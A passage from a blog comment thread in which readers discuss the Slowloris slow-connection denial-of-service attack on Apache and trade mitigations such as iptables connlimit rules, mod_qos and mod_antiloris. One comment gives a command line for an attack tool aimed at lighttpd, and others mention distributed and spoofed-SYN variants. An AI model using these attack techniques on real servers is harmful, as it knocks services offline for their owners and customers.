  131. Julius B. Thijssen Says:

    Most recent linux server distributions have the connlimit module in iptables, in which case they can simply use something like:

    # /sbin/iptables -A INPUT -p tcp –syn –dport 80:443 -m connlimit –connlimit-above 12 –connlimit-mask 24 -j REJECT

    or even

    # /sbin/iptables -A INPUT -p tcp –syn –dport 80:443 -m connlimit –connlimit-above 12 –connlimit-mask 24 -j DROP

    if you don’t want to be bothered by a busy line upwards.

  132. id Says:

    @Julius B, While that may stop Slowloris, it will also let me DoS your clients with spoofed SYN packets.

  133. nimda Says:

    to zombify lighttpd i ran a default lighttpd config with a timeout lowered to 60 seconds
    on the other side killit was called with
    ./killit localhost 80 60 4096. in this scenario altho i was able to connect with nc to lighttpd i didnt got served. i had no idea what the fd limit was.

    if lighttpd wouldnt be vulnerable to timeout-reset then this wouldnt happen. picture this in a ddos attack as a dos like this would be easy to make it go..

    i wouldnt go too much further with the apache-war hat you’re wearing now.

  134. Marcus Spiegel Says:

    mod_qos together with mod_antiloris did the trick for me… best directive used by mod_qos probably is:

    # minimum request/response speed
    QS_SrvMinDataRate 150 1200

    (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything)

    so apache still keeps up responding while getting attacked. I just published a quick howto: http://www.howtoforge.com/node/4644 how mod_qos helped me.

  135. hopefull Says:

    here is a couple of interesting links:



    …i think, anyway

  136. burmese Says:

    With slowloris tool released, hundreds of hosting providers are now implementing mitigation factors. This is very good response. Or else they didn’t even know they’re vulnerable. Good work, RSnake.

  137. passing-by-anon Says:

    shame on you, apache.
    your willful ignorance had to be punished.

  138. Stephan Edelman Says:

    The argument whether this is the Apache Group’s problem or not is irrelevant, Slowloris is able to bring our apache servers to its knees with our customers complaining about extremely slow web responses. We run several e-commerce websites for commercial clients that are loosing real dollars because of this vulnerability.

    Although the IPTABLES solution proposed by Mr. Thijssen will do the trick, I believe the mod_qos provides for the real solution at the application level (where the problem resides) so we’re going to try it out and we’ll report back.

  139. mrbig4545 Says:

    @RSnake, good code, I like it! Also, its finally motivated me to finish my code and migrate it away from apache, I’m thinking Cherokee, so thanks for that!

  140. Nico Golde Says:

    YFYI, Debian unstable now comes with an apache module to mitigate this:
    http://packages.debian.org/sid/libapache2-mod-antiloris which basically let’s you configure the maximum number of simultaneous connections in read state on a per IP basis. I didn’t try it yet though.

  141. Nico Golde Says:

    hmm ok this fixes the 1 script n connections problem and effectivley your PoC but the general attack vector via a small network performing this distributed is still open :/

  142. kik Says:

    Even if this post is a bit old, I think this worth mentions it. Today, the github blog features a webserver project based on erlang and called yaws : http://github.com/klacke/yaws .

    Ali Ghodsi and Joe Armstrong benchmarked its concurency requests versus apache : http://www.sics.se/~joe/apachevsyaws.html .

    I thought you may be interested in it.

  143. habbatussaudaaa Says:

    slowloris is the bestttttttttttt